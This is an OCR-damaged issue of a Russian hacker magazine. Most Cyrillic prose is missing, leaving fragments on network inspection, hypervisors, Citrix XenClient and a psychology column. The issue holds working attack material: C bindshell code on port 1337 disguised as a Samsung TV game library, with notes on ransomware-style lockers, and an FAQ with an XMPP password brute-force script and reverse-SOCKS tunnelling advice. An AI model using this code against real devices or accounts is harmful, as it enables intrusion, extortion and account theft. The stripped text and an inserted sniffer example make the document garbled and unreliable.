aspx?testValue=1!2@34$5%6^[{NIS-Test-URL}]1!2@34$5%6^.
NIS
(12234). SMB.
Malware Protection
Center, Details
.

(. 8).
,
NIS.
Firewall Policy (. 9).

. 4. Behavioral Intrusion Detection

. 3.

NIS

: vulnerability based ( ), exploit based ( ) policy


based ( ,
).

. ,
, ,
, .
,
Microsoft Malware Protection Center (MMPC). MMPC , Telemetry Service.
Forefront TMG . Basic
Membership Microsoft
, .
Advanced Membership
URL, .
NIS Properties
Definition Updates, : ( ),
.
, , . Automatic polling
frequency NIS,
TMG Update Center.

,
, VPN. NIS Properties
Response policy .
Microsoft default policy,
, MMPC.
:
(Detect only response), (No response Disable signature). NIS

.5. Network Inspection System


, . Definition
Updates Version Control.
.
.
. ,
, . , . :
Attention Required, Response, Policy Type, Business Impact, Category,
Date Published, Severity, Fidelity, Protocol Status.
.
, , HTTP,
RPC over HTTP. ,
, ,
. ,
, ,
Microsoft Default Policy,
. ,
, NIS
.
(Detect Block) NIS
IDS IPS.
, .


SYN/ACK

. 6.

. 8. NIS

. 9. NIS

.



Detect only Forefront TMG Customer Support.
, -
.
MMPC , Telemetry
Service. ,
.

. 7. NIS


NIS, , . :
. z

SYN/ACK
grinder (grinder@tux.in.ua)

.
, .
, .

VMware ESXi

, , VMware, . VMware
Workstation VMware Player. MS
Virtual PC Workstation.
- ,
.
VMware ESXi ,
, VMware vSphere (
, . ][ 08.2010). , ESXi
Linux, (VMkernel)
: vCLI (vSphere CLI), PowerCLI (PowerShell
vCLI), SSH DCUI (Direct Console User Interface).
ESXi
VMware,
ESX. ESX , VMware
VSphere ESXi ( VMware vSphere
Hypervisor), ESX ESXi .
ESXi.
ESXi ESX .
ESX Linux, . VMware
COS (Console OS),
. : ~2
350 ESXi ( 70).
ESXi VMkernel,
(, )
.
, .

firmware . -
ESXi (clck.ru/9xlp) ,
ESX, ,
. ,
ESXi Whitebox HCL (clck.
ru/9xnD), VMware ESXi.
,
.
VMware
. Windows, Linux, Solaris,
FreeBSD, Netware , .
ESXi
ESX Active Directory
( ),
(


),
VMware vStorage VMFS/Storage VMotion SAN,
, VMsafe Security
API. CPU, , (
).
(
PXE), 4.1 ,
, vCenter Server. VSphere API
ESXi.
VMware
vCenter Converter (vmware.com/products/datacentervirtualization/converter), ESXi
MS Virtual Server, Virtual PC, Hyper-V,
, Acronis True Image, Norton Ghost .
, ESXi
- VMware Go (go.vmware.com), , ESXi
VM.

MS Hyper-V

MS,
2008 . Win2k8R2 Hyper-V
Live Migration, ,
.
Hyper-V
Ring-1.
, . Windows
Server 2k8/R2 ( Server Core)
MS
Hyper-V Server 2008 R2 (microsoft.com/hyper-v-server).
( Client Access License),
Windows. ,
Server Core,
( )
.
, Hyper-V
, .
Live Migration, .
, MS Hyper-V Server,
1 8 CPU, .
32- 64- Windows
XP SP3, Vista SP2/2k3 SP1/2k8 Linux (SLES RHEL). ,

XenServer
XenServer ( 5.6.1) - VMware
ESXi. ,
.
XenCenter,
Citrix.
XenServer .
;
Live Motion; ,
;
(RBAC) Active Directory;
,
RAM VM .
,
,
.
(High
Availability). ,
, .

( , NAS, SAN ).
VMWare VMDK,
MS VHD, VDI, WIM.

Windows, Win2k SP4, Linux (SLES, RHEL/CentOS, Oracle EL, Solaris, Debian).
64 , 256 16
.
, VM

: , , .


*nix Ubuntu, FreeBSD


.
Linux 2.6.32+, Hyper-V
(LinuxIC, MS GPL). ,
Win2k8 4 vCPU.
MS Hyper-V Server x64
CPU, Intel VT AMD-V, 1 RAM.

MS System Center Virtual Machine
Manager 2008 (SCVMM 2008), P2V(Physical to Virtual) V2V- ( VMware).
, P2V Win. , , Linux, : VMware vCenter Converter ESXi
SCVMM Hyper-V. ,
, .
,
. SCVMM
VMDK2VHD (vmtoolkit.com/files), Citrix
XenConvert, Quest vConverter (quest.com/vconverter).

OpenVZ

OpenVZ (OpenVZ.org)
Linux, (Virtual
Environments). , .
Linux.
, .

,
.
( 1-3%).


SYN/ACK

AQEMU
CentOS
64 RAM, 4096 CPU
.
(venet), VM
(IP ). , - (
,
) OpenVZ , ,
Linux.
.
( inodes / ),
, VM.
VM.
(Checkpointing),
. ,
.

(download.openvz.org/contrib/template/precreated),
.
OpenVZ vzctl (vzlist, vzmigrate, vzcalc, vzcfgvalidate, vzmemcheck,
vzcpucheck, vzpid, vzsplit ).
, , OpenVZ, KVM Xen ( ) WebVZ (webvz.sf.net), Kloxo ( Proxmox VE) HyperVM.
OpenVZ , Debian.

KVM

KVM (Kernel-based Virtual Machine)


RedHat
.
Intel VT AMD V. , KVM
:
CPU (, Intel Atom) .
,
. :
$ egrep '^flags.*(vmx|svm)' /proc/cpuinfo

GNU GPL, RedHt


Novell .
(kvm.ko) userspace.


OpenVZ
QEMU
(qemu.org), . CPU
kvm-amd.ko kvm-intel.ko. /dev/kvm.
,

. - , balloon (
) Virtio,
userspace. , OpenVZ, , , 20%. KVM Linux, *BSD,
Windows, Solaris, Mac OS X .
,
16 vCPU ( , Win XP,
). , ,
Linux,
, .
.
, KVM vmdk-,
VMWare, HOWTO (clck.ru/9xlp).
, KVM Linux
2.6.20 (, ),
.
KVM savevm/loadvm, offline ( migrate*).
( CPU) ,
.

INFO

info

ConVirt
Hyper-V
Win2k8
,
. :
, .
P2V .
dd, QEMU,
.
VMWare Converter.
KVM QEMU (
), (
, ) .
/dev/kvm kvm.
-
virt-manager, RedHat,
qemu* kvm.
(
).
: , Karesansui (Xen/KVM),
Symbolic, ConVirt (Xen/KVM), Ganeti (Xen/KVM).

Xen

90-,

, GNU GPL.
2007 .
XenSource,
Citrix,
Citrix XenServer (CentOS + Xen). , Xen Oracle VM.
Xen, .
Xen Cloud Platform.
Xen ,
()
(HVM, Hardware Virtual Machine)
(PV). , , CPU Intel-VT
AMD-V,
. , Xen
.

, Xen
: x86, x86_64, Itanium, Power PC ARM, Linux, NetBSD FreeBSD.
WinXP,

VM Karesansui
. Linux, NetBSD,
FreeBSD, Solaris Windows.

, 8%. Live Migration, ,
,
, VM
(Remus Fault Tolerance), USB-.

,
( ).
4.1 > 255
CPU, 1 RAM, 128 vCPU;
CPU
.
vanilla Linux Xen 2.6.37,
Linux
.

xen-utils, xen-tools, . , ,
virt-manager, AQEMU, OpenQRM, Xen
Orchestra, Zentific, xnCORE .

.
,
.
, .
.
,
OpenSource, . z


VMware vSphere
,
][ 08.2010.
BSOD
Windows, ESXi
PSOD (Purple
Screen of Death).


MS
System Center Virtual
Machine Manager
2008.
Linux
2.6.32
Hyper-V.


, ][ 04.2010.
Citrix
XenServer

, ][
05.2009.

HTTP://WWW
links
VMware:
vmware.ru;
MS
Hyper-V Server 2008
R2: microsoft.com/
hyper-v-server;

OpenVZ: download.
openvz.org/contrib/
template/precreated.


SYN/ACK
, c Group-IB

-

.
.
, , .
:
, , ,
.


.
.
.
, , ,
, , . VMware ESX, Citrix
XenServer, Microsoft Hyper-V.
, : VMware Workstation, Oracle Virtual Box
.
,
.
,

(, ][).
,

.
,
(, ) .
, . ,
-,
.

VT-x? VT-d!


Intel. (VT-x)

. (VT-d)
,
,
-.
VT-d
,
.
. -


, , .

, .
? , ,
.
Citrix, Xen Client.
2010 ,
,
. ?
,
. .
, . .
,
( ),
,
.

,
.
,
, , , . ,
,
.
,
, , , , ,
,
. Xen Client , ,
citrix.com.

Xen Client . .
Intel VT-d,
Core i5-5xx Core i7,
Sandy Bridge Core i5-25xx.
3D- , ,
( . .),
Intel GMA X4500 Intel GMA HD.

Xen Client
, Xen Client

, , IDS- DLP-.
,
.

Xen Client
.

.
Windows
(XP-Seven),
Linux, Xen Tools. Mac
OS X .

,
.
, ,
. ,
.
ISO , Citrix Synchronizer.
, , .
,

,

,
SynAsk

, , -, . ,
-
3-6 . . . . .
. . -
, , IT,
18:00,
,
.


. ?
, ,
,
- .

, ,
, , ;
.
, ,
,
:). .
, .

. .

. -


SYN/ACK

!

.
,
, . ,
. , .
.
, Citrix
Synchronizer. Synchronizer,
, ,
. ,
.

.
. ,
USB Wi-Fi. ,
.
, ,
. ,
Xen Client:
1.
, Enterprise-, .
2. .
3.
. ,
,
, ,
.
4. ,
, -



.
, , ,
, .

Xen Server ?
: Citrix Receiver. ,
(
, Android iOS). Citrix Receiver
. ,
, Desktop Delivery Controller,
.
Citrix VDA,


Desktop Delivery Controller,
,
. Citrix Receiver,
.
, Microsoft Office 2010
. ,
RDP?
Xen Server Xen
Desktop,
,
, .
Citrix
Citrix XenVault Citrix XenApp.

. ,
. Citrix
XenApp , . .
XenApp 1 ,
, ,
.
, ( ) ,

. Citrix XenVault , .
AES 256- , ,
.
.
. Xen Client, XenVault
, . ,

.

, ,
. ,
,
, .

XenClient
.

,

. .
, :
1.
.
2.
.
3. .
4. .
:
1. .
2. .
3. .

, Citrix. ,
(,
:) . .) ,
. ,

. z


PHREAKING
HellMilitia

, ,
.
Samsung LE650B.
GNU/Linux, BusyBox,
, .

,
.
: ,
.
, .

,
Ethernet-. ,
,
. ,
192.168.1.2, 192.168.1.1.
- .



nmap:
$ nmap -A 192.168.1.2
Nmap scan report for 192.168.1.2
Host is up (0.00019s latency).
All 1000 scanned ports on 192.168.1.2 are closed
MAC Address: 00:12:FB:89:50:3E (Samsung Electronics)
OS details: Linux 2.6.14 - 2.6.16, Linux 2.6.17 (Mandriva)

, ,
:).
TCP- . , UDP- ?
# nmap -sU 192.168.1.2


Nmap scan report for 192.168.1.2
Host is up (0.00021s latency).
Not shown: 997 closed ports
PORT     STATE         SERVICE
1024/udp open|filtered unknown
1026/udp open|filtered win-rpc
1900/udp open|filtered upnp
MAC Address: 00:12:FB:89:50:3E (Samsung Electronics)

UPnP, -.
HTTP XML .
UPnP DLNA (Digital
Living Network Alliance) ,
- , Wi-Fi/Ethernet
DLNA-.
UPnP , .

GUI

,
:).
, , - ?
, .
:
Samsung
SDK . ,
, e .
, bindshell. Samsung
AppStore. , . :
xml- clmeta.dat manifest-, ; game.so
sharedlibrary, .
.
, :
$ file game.so
game.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, not stripped

ARM! , .
, objdump,
Game_Main, , , . -
, ,
.
(FAT32) , ,
ContentLibrary. ContentLibrary:
, ,
. , .
-.
Bindshell , ,
sharedlibrary Game_Main().
-
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/ip.h>
extern Game_Main;
void Game_Main()
{
int icmp_sock, shell_sock, cli;
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(1337);
shell_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
bind(shell_sock, (struct sockaddr *)&sin, sizeof(sin));
listen(shell_sock, 1);
cli = accept(shell_sock, NULL, 0);
dup2 ( cli, 0 );
dup2 ( cli, 1 );


PHREAKING


,
,
. ,
3.5- . , -,
, RS-232.
:
.
1. .
2.
.
3. usb, (
usb-flash ): /lib/modules/rc.local.
NAND- rfs:
# insmod /lib/modules/fsr.ko
# insmod /lib/modules/rfs.ko
# insmod /lib/modules/fsr_stl.ko

, : bml.erase /dev/bml0/5.
, , : bml.restore /dev/bml0/5 /
dtv/usb/sd1/Image.img.
u-boot.

u-boot.
,
[INFO] [MENU] [MUTE] [POWER]. -


/dev/bml0/3 uboot_env.bin
/dev/bml0/4 fnw.bin
/dev/bml0/5 Image
/dev/bml0/6 rootfs.img
/dev/bml0/7 boot.img

Control Suboption Rs232 jack


Debug, Control Suboption Watchdog -

. ,

. -

u-boot.

, Hit any key to stop autoboot.

0, .

help.

e FAT32;

usb- : bbmusb.

/update;

e :

, kernelimage (4). ,
( Image),

/dev/bml0/1 onboot.bin
/dev/bml0/2 u-boot.bin

dup2 ( cli, 2 );
execl ( "/bin/sh", "sh", NULL );
}

:
arm-linux-gcc bindshell.c -fPIC -shared -o game.so


. , .

-
game.so ( ) clmeta.dat
( ).

. -

mount


1337 . - :

, .
, ,
:

$ telnet 192.168.1.2 1337

, ,
busybox
. busybox, help, , vi.

mtd_*-:
flash-.
:
# cat /proc/version
[28_64_512] Linux version 2.6.18_SELP-ARM (ksh921@sp) (gcc
version 4.2.0 20070514 (GPL2) (SELP 4.2.0-3.0.5.custom 200710-31(14:53))) #81 PREEMPT Mon Jun 22 10:10:31 KST 2009

passwd:
# cat /etc/passwd
root::0:0:Root,,,:/:/bin/sh

# dmesg

:
<5>CPU: ARMv6-compatible processor [410fb767] revision 7
(ARMv6TEJ), cr=00c5387f
<4>Machine: Samsung-SDP83 Eval. Board(64bit 512MB)
<6>SDP83 Core Clock: 600.0Mhz
<6>SDP83 DDR2 Clock: 399.937Mhz

e : ARMv6 600Mhz, DRRII 400Mhz 512MB.


TEJ :
T: THUMB- . 16 ( 32).
.
E: Enhanced DSP instructions.
J: Jazelle DBX (Direct Bytecode eXecution) , ARM Java -. ,
- . -

df



PHREAKING

Java-.
, exeDSP .
:

:
$ unsquashfs rootfs.img

# lsmod
rt73          354092   0xbf531000
rt2870sta     674644   0xbf48b000
usb_storage    37796   0xbf480000
ohci_hcd       18692   0xbf47a000
ehci_hcd       29992   0xbf471000
usbcore       129064   0xbf450000
usb_fault       4380   0xbf44d000
8139too        23296   0xbf446000
samdrv       3875988   0xbf092000
rfs            71688   0xbf07f000
fsr_stl       251448   0xbf040000
fsr           257756   0xbf000000

: 2 Wi-Fi Samsung.
, . usb; ; samdrv
;
Samsung, fsr* .

mount, df /sbin/
update.sh,
:
/dev/tbml6, squashfs, ro, / ;
/dev/tbml7, squashfs, ro, /mtd_boot MinicomCtrl, ;
/dev/tbml8, rfs, ro, /mtd_exe ,
exeDSP, samdrv.ko,
;
/dev/tbml9 squashfs, ro, /mtd_appdata
;
/mtd_tlib MediaContent , ;
/mtd_down ;
/dtv/usb/sd* usb-flash.
, : squashfs rfs. Squashfs
ReadOnly,

, ,
.
, . :
# cat /dev/tbml6 > /dtv/usb/sda/rootfs.img

,
. , :
/mtd_exe/GAME_LIB/ SDL-,
\;
/mtd_exe/InfoLink/keyconfig ,
;
/mtd_appdata/resourse (on.mp3), (off.mp3), (factory_reset_bell.
mp3) , (self.mp3).


/mtd_exe? RFS
FAT16, ,
:
$ mkdir mtd_exe
$ mount mtd_exe.img ./mtd_exe -o loop
$ ls -la mtd_exe


: ,
/ (/mtd_appdata/resourse)
(/mtd_exe/InfoLink/
keyconfig).

,
. , . ,
? :
1.
Winlock. ,
SMS,
.
, .
: ,
sms XXXX. ,
.
2.
adware, ,
.
3. DDoS/-

Linux. , ,
, DDoS- .
, . :
.
SDL.
.
RO-, .
.
, game.so, wrapper
, ,
.
, . ,
fork 2 : ,
. :
#define VIDEO_X 1920
#define VIDEO_Y 1080
#define VIDEO_BPP 32

UPnP-Inspector
#define SCREEN_FLAGS

return 0;
}
SDL_BlitSurface(image, NULL, screen, NULL);
return 1;

...
flog = fopen("/dev/kmsg", "a+");
...
}
int init_video(void)
{
if(SDL_Init(SDL_INIT_VIDEO) == -1 )
{
fprintf(flog, "Fail with SDL_Init: %s.\n", SDL_GetError());
return 0;
}
atexit(SDL_Quit);
if(!(screen = SDL_SetVideoMode(VIDEO_X, VIDEO_Y,
32, SCREEN_FLAGS)))
{
fprintf(flog, "Fail with SDL_SetVideoMode: %s.\n",
SDL_GetError());
return 0;
}
return 1;
}

,
SMS.... , e .
:
int draw_image()
{
if(!(image = SDL_LoadBMP("/mtd_down/locker/fuckup.bmp")))
{
printf("Fail with LoadBMP: %s.\n", SDL_GetError());

SDL_BlitSurface() . .
, .

Internet@TV

Internet@TV -: AccuWether, Youtube, Twitter,


Facebook. Twitter: ,
.
Twitter, , , .
/mtd_down/common, WidgetMgr. cpdata1.dat
localId.dat. ,
:
# cat localId.dat
hm
1111 cpdata1.dat
# cat cpdata1.dat
Twitter HellMilitiaFuckUAll

: localId
e , .
login:pin:passwd_file.
c pdataN ( N e ,
),
. ,
-. z


UNITS
(oriyana@xpsycho.ru)
(andrushock@real.xakep.ru)

PSYCHO:

,
IQ,
100% . , ?
, , , ? . ? , , .
,
,
, , ,
, .

,
100%, - 7-10%, .
, , ,
, .
,
.


.
, .
,
,
, , .
. ,
, , ,
.
,
. :
,
, , ;
,
;
( ),

;


-,
;
, ;
(. ) , , -
( , ,
);
, , .
?
,
,
,
.
. , -.

, , - ,
. ,
, .

- , , , .
,
:
, .
, ,
:
( , , )
.
: ,


, , ,
. , .

(goo.gl/iuzQL).
, ( ). ,
: ,
,

()

,
(
- ), , , : , .


, ,
. , ,
. , ?
:
,
.
, (
!,
).
- ,
.
, !.
: , , ,
, .
- -


UNITS

,


(, ).
, .
, ? :)

, : ,
.

.
:
, - .

.
: ,
; 5 . , , ,
(. ). , , (
) , .


(lushertest.ru),
, ,
. , - . ,
, .


:
,
,
.

, .
:
,
:
, ,
, . , ,
. , ,
,
, .
, 5-10 , , .

,
, , , -


, ,
.
, , ,
.


, 10. -
. . ,
, .
,
,

, , .
. , ,
, ,
. :
, . -

, -
,

: (),
(), ,
, , ,
.

,


.

5,
, .


,
,
.
,
,

(
),

,
,

.

()
.

.
:
,
;
,
-,
,
,

.
,

-

.
: ,
.
, Aphex
Twin
,


: ,
, ,
,
, ,

Klangfarbe,

.

137

UNITS

,
, .
,
, ,
, ,
.
(
) (
).

. :
, -
, , ,
, . , ,
, ,
, ,
.

,
, : ,
, ,
, .
- , ,
, .
, .

.
, .
, . , ,
.

, ,
.
, ,
. ,
.
, - ,
- : , (
)
.

,
.
, , ,
, .
, , , . ,
, ,
, , .

, , , :
, ,
. , ,
?.
: ,
. ,
, ,
- (, ), , ,
.
,
,
, . ,
, .


,
5-7
. ,
, ; ; , -
, .
:
.

, , , , .
, ,
.

, , .
,

138


, .
,
( ).
:
, ,
.
, , , - ;
, , ,
(,
!): -, , -
(, );
- , ,
, , .
: , ,
:). z
X 06 /149/ 2011

How to subscribe
1. Choose the magazine and the subscription period in the online shop, shop.glc.ru.
2. Pay for the order.
3. Receive the magazine.
Subscription desk:
e-mail: subscribe@glc.ru;
phone: (495) 545-09-06;
post: 115280, Moscow, bldg. 19, 5th floor, office 21.

Prices: 12 issues 2200 rub., 6 issues 1260 rub.
Combined subscription, two magazines with two DVDs: 12 months 3890 rub. (24 issues), 6 months 2205 rub. (12 issues), about 35% cheaper than buying the issues separately.
Questions: info@glc.ru, 8 (495) 663-82-77 (Moscow) or 8 (800) 200-3999 (toll-free from the regions).
UNITS
Step (twitter.com/stepah)

FAQ UNITED
Got a question? faq@real.xakep.ru
Q: Exploits that I take from milw0rm.com and similar archives, the ones that launch an .exe, do not work on Windows 7, while the same attacks through Metasploit work fine. Why?

A: The vulnerability is the same; the difference is the payload. Most old public exploits carry shellcode hard-wired to a particular Windows version (see the analysis by the Bkis security lab, bit.ly/fXfbCH), so there is no 100% guarantee it survives a change of OS. Metasploit's payloads resolve API addresses at run time and therefore do not care. Instead of rewriting the milw0rm exploit, swap its payload for a universal one, for instance SkyLined's w32-exec-calc shellcode (code.google.com/p/w32-exec-calcshellcode): about 100 bytes, and it runs calc.exe on any 32-bit Windows.

Q: How do I check whether my browser and its plugins are up to date, that is, whether I am running versions with known holes (the plugins are the usual suspects)?

A: Google Chrome updates itself silently, but that covers the browser, not every plugin. Google offers Secbrowsing (bit.ly/hQNnVu), a Chrome extension that checks plugin versions against the current ones. For Mozilla Firefox there is Plugin Check (mozilla.com/en-US/plugincheck), a web page that lists your plugins and flags the outdated ones; it works from other browsers too. Qualys BrowserCheck (browsercheck.qualys.com) does the same kind of check for all major browsers. And Secunia PSI (secunia.com/vulnerability_scanning/personal) goes beyond the browser: it scans every program installed on the machine for missing security updates and points you at the patches.

Q: I keep missing grep on Windows. What can I do?

A: Several things.
1. Install a port of grep. Options include GnuWin32 (gnuwin32.sf.net), Windows grep (wingrep.com), GNU Grep For Windows (steve.org.uk/Software/grep) and Grep For Windows (grepforwindows.com, pages.interlog.com/~tcharron/grep.html). Any of them will do.
2. Use what is already there. Since XP, Windows ships find and findstr, and findstr understands regular expressions. To call it as grep from anywhere, wrap it in a script placed in a directory that is on the PATH:

echo findstr %1 %2 %3 %4 %5 > %systemroot%\grep.cmd

%1 is not expanded at the interactive prompt, so the placeholders land in the file literally; %* instead of %1..%5 would forward all arguments, and a leading @ would suppress the command echo you see below. Since %systemroot% is on the PATH, grep now works in any directory:

C:\Windows\system32>netstat -an | grep LISTEN

C:\Windows\system32>findstr LISTEN
  TCP    0.0.0.0:80     0.0.0.0:0    LISTENING
  TCP    0.0.0.0:135    0.0.0.0:0    LISTENING
  TCP    0.0.0.0:443    0.0.0.0:0    LISTENING
  [...]

3. In PowerShell the equivalent is select-string. To find the string xakep in the files of the current directory:

select-string .\*.* -pattern "xakep"

select-string is more than a grep clone. Combined with get-childitem it searches recursively; this finds e-mail addresses in every .txt file under C:\:

get-childitem c:\ -include *.txt -rec | select-string -pattern "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}"

[Sidebar: Project Ubertooth, a Bluetooth sniffer for about $100]
[Screenshot: Code Coverage Analysis Tools call graph in Kcachegrind (onInsert, onUpdate, onRemove)]
Q: Is there a client-side database for web pages, something like SQLite but living in the browser?

A: Yes, and in pure JavaScript with no server involved, for instance Taffy DB (taffydb.com). It is a JS library that keeps the data in the browser and is queried through its own JavaScript API rather than SQL. Its selling points:
runs entirely in the browser;
small, under 10 KB;
works alongside the AJAX frameworks: jQuery, Dojo, Prototype, Ext;
a full CRUD interface (Create, Read, Update, Delete);
fast enough for the data volumes a page actually handles.

Q: I need keyboard shortcuts in a web application. Is there something ready-made?

A: The JavaScript Shortcuts Library (stepanreznikov.com/js-shortcuts) is a jQuery plugin that is as simple as it gets. Usage:
1. Add a handler for a key-down event:

$.Shortcuts.add({
    type: 'down',
    mask: 'Ctrl+A',
    handler: function() {
        debug('Ctrl+A');   // debug() stands for whatever logging function you use
    }
});

2. Add a handler for a key-up event:

$.Shortcuts.add({
    type: 'up',
    mask: 'Shift+B',
    handler: function() {
        debug('Shift+B');
    }
});

3. Start listening:

$.Shortcuts.start();

That is all. The mask is a string of key names joined with +, with the modifiers (Ctrl, Shift, Alt) first. Supported names:
modifiers: Ctrl, Shift, Alt;
digits: 0-9;
letters: A-Z (case-insensitive);
special keys: Backspace, Tab, Enter, Pause, CapsLock, Esc, Space, PageUp, PageDown, End, Home, Left, Up, Right, Down, Insert, Delete, F1-F12 and a few others.
Event types (the type field):
down fires when the key is pressed;
up fires when it is released;
hold fires repeatedly while the key stays pressed.
Details and the download: stepanreznikov.com/js-shortcuts.

Q: I work in Windows but I like Mac OS X's Dock and overall look, and I would rather not switch systems. Any way to have both?

A: Lion Skin Pack 3.0 For Seven (hameddanger.deviantart.com/#/d3bg7fq). It reskins Windows 7 after Mac OS X Lion, Dock included, without touching the OS underneath. Version 4.0 is on this issue's DVD.

Q: I have access to a machine in a network I want to look around from the inside. A SOCKS server on it would be ideal, but I cannot connect to the machine directly (it sits behind NAT with no port forwarding). Is there a SOCKS server that connects back to me?

A: Yes, a reverse SOCKS server. sSocks (sourceforge.net/projects/ssocks) does exactly that and comes in two parts. rcsocks runs on your machine: it listens on one port (say 1080) for the backconnect from the target and on another (say 1088) for local SOCKS clients. rssocks runs on the target and connects out to your IP on port 1080. Once that link is up, point any SOCKS-aware program (a browser, an SSH client and so on) at port 1088 on your machine and its traffic is relayed through the target into its network. A demo: vimeo.com/22515255.

Q: I need to brute-force an account on a Jabber (XMPP) server. What do I use?

A: THC-Hydra (thc.org/thc-hydra) is the first thing to reach for; if your build has no XMPP module, rolling your own is trivial, because XMPP authentication is easy to drive from Python with the xmpppy library (Python 2, which xmpppy requires):

import sys
import xmpp

jid = xmpp.protocol.JID("name@server.org")
wordlist = open(sys.argv[1])          # one candidate password per line

for password in wordlist:
    password = password.rstrip("\r\n")
    client = xmpp.Client(jid.getDomain(), debug=[])
    if not client.connect():
        sys.exit("cannot connect to %s" % jid.getDomain())
    # auth() returns 'sasl' or 'old_auth' on success and None on failure,
    # so test the value rather than comparing it with 'sasl' only
    auth = client.auth(jid.getNode(), password, resource=jid.getResource())
    if auth:
        print password
        sys.exit(1)
    client.disconnect()

Q: What do I use to look for rootkits on a Windows machine?

A: There is no single best tool; run a couple of anti-rootkit scanners and compare their findings. Three good ones:
1. GMER (gmer.net);
2. RootRepeal (sites.google.com/site/rootrepeal);
3. RkUnhooker (bit.ly/dOYgBO).
What they look for: hidden processes, threads and modules; hidden drivers and services; files hidden from the NTFS file system; hidden registry keys; hooks in the TCP/IP stack; and hooks in the SSDT, the IDT and drivers' IRP handlers.

Q: How do I get at services available only in certain countries, the online radio Pandora (pandora.com) for instance? It refuses me because of my IP. Free proxies (slow, short-lived, unreliable) are not an option. What else is there?

A: A VPN server abroad. If you do not mind spending a little, rent a box in the right country and put a VPN on it; Amazon's cloud works fine for that, it is cheap and gives you an American IP. If you want it for free, try Free Hide IP (free-hideip.com), which hides your real address behind its own servers.

Q: I need to capture traffic on a remote machine where I cannot install anything, WinPcap included. Is there a sniffer that needs no driver?

A: RawCap (netresec.com/?page=RawCap). It is a 17 KB executable with no DLL dependencies; all it needs is .NET Framework 2.0. It captures on any interface (Wi-Fi included) using raw sockets instead of a capture driver and writes pcap files, so the dump opens in Wireshark. One caveat: on Vista and Windows 7 raw-socket capture is restricted, so expect limitations there.
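A cut-down RawCap in Python, added here as an illustration and not code from RawCap or the Netresec site. It captures with a raw socket and the Windows SIO_RCVALL ioctl, the same driverless approach RawCap relies on, and writes standard pcap with the DLT_RAW link type, because a raw IP socket hands over packets starting at the IP header. Function and file names are the example's own; the sample packet is constructed, not captured. Live capture needs an elevated prompt on Windows (on Linux the same needs an AF_PACKET socket, which this example does not implement); the pcap encoder and the IPv4 decoder run without privileges.

```python
"""Added example: a minimal RawCap-style sniffer (raw socket -> pcap) in Python 3."""
import socket
import struct
import sys
import time

LINKTYPE_RAW = 101   # DLT_RAW: records start at the IP header, no link-layer header


def pcap_global_header(snaplen=65535, linktype=LINKTYPE_RAW):
    """24-byte pcap file header: magic, version 2.4, tz 0, sigfigs 0, snaplen, link type."""
    return struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, snaplen, linktype)


def pcap_record(packet, ts=None):
    """16-byte per-packet header (sec, usec, captured len, original len) + packet bytes."""
    if ts is None:
        ts = time.time()
    sec = int(ts)
    usec = int((ts - sec) * 1_000_000)
    return struct.pack("<IIII", sec, usec, len(packet), len(packet)) + packet


def ipv4_summary(packet):
    """Decode the IPv4 header of a captured packet: (src, dst, protocol, total length)."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    total_len = struct.unpack("!H", packet[2:4])[0]
    proto = packet[9]
    src, dst = socket.inet_ntoa(packet[12:16]), socket.inet_ntoa(packet[16:20])
    return src, dst, proto, total_len


def build_sample_packet():
    """Constructed IPv4/UDP packet (not captured traffic) for offline use of the encoder."""
    payload = b"hello"
    udp = struct.pack("!HHHH", 40000, 53, 8 + len(payload), 0) + payload
    total = 20 + len(udp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0x1234, 0, 64, 17, 0,
                     socket.inet_aton("192.0.2.10"), socket.inet_aton("192.0.2.53"))
    return ip + udp


def capture(bind_ip, outfile, count):
    """Windows-only live capture: bind a raw socket to an interface IP, switch it to
    receive-all mode (SIO_RCVALL, what RawCap uses), write `count` packets as pcap."""
    if sys.platform != "win32":
        raise NotImplementedError("raw IP sockets only see all traffic on Windows; use AF_PACKET on Linux")
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
    s.bind((bind_ip, 0))
    s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
    try:
        with open(outfile, "wb") as f:
            f.write(pcap_global_header())
            for _ in range(count):
                pkt = s.recv(65535)
                f.write(pcap_record(pkt))
                print("%s -> %s proto %d len %d" % ipv4_summary(pkt))
    finally:
        s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
        s.close()


if __name__ == "__main__":
    # usage: python rawcap_py.py <local interface IP> <out.pcap> [packet count]
    capture(sys.argv[1], sys.argv[2], int(sys.argv[3]) if len(sys.argv) > 3 else 10)
```

The link type matters: tag the file as Ethernet and Wireshark will try to parse the first 14 bytes of the IP header as MAC addresses, which is a common mistake when writing pcap by hand.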

Q: Is there a way to sniff Bluetooth traffic the way one sniffs Wi-Fi, and with hardware that does not cost a fortune?

A: Until recently there was not. Wi-Fi sniffing needs nothing but a cheap adapter, while Bluetooth sniffers were niche equipment. At ShmooCon 2011 (talk at bit.ly/dJWAsC) Michael Ossmann presented Ubertooth (ubertooth.sourceforge.net) and changed that. Commercial Bluetooth sniffers cost around $1000 and more; the Ubertooth One is an open-source design with a parts cost of about $100. It is a USB dongle built around an ARM Cortex-M3. In promiscuous mode it listens to Bluetooth traffic between other devices, and a plugin for Kismet (kismetwireless.net) displays the captures the way Kismet shows Wi-Fi.

Q: I want to measure code coverage of a Windows program I have no source for.

A: Code Coverage Analysis Tools (github.com/Cr4sh/Codecoverage-analysis-tools) by Cr4sh. It is built on Intel's PIN (pintool.org), a dynamic binary instrumentation framework, so it works on any executable. The procedure:
1. Install PIN.
2. Place Coverager.dll, the PIN tool, in the PIN directory.
3. Open execute_pin.bat and set PINPATH to where PIN lives.
4. Run the target under the tool, for example:
execute_pin_calls.bat calc.exe
5. When the target exits you get CoverageData.log.<N>, one file per thread, <N> being the thread number. Convert the log of the thread you care about to Calltree Profile Format:
python coverage_to_callgraph.py <log_file_path> <thread_number> [options]
6. Open the resulting Callgrind.out in Kcachegrind (a Windows build is at sourceforge.net/projects/precompiledbin) and browse the call graph. More in the author's blog: esagelab.ru/blog.

>Net
Acrylic DNS Proxy
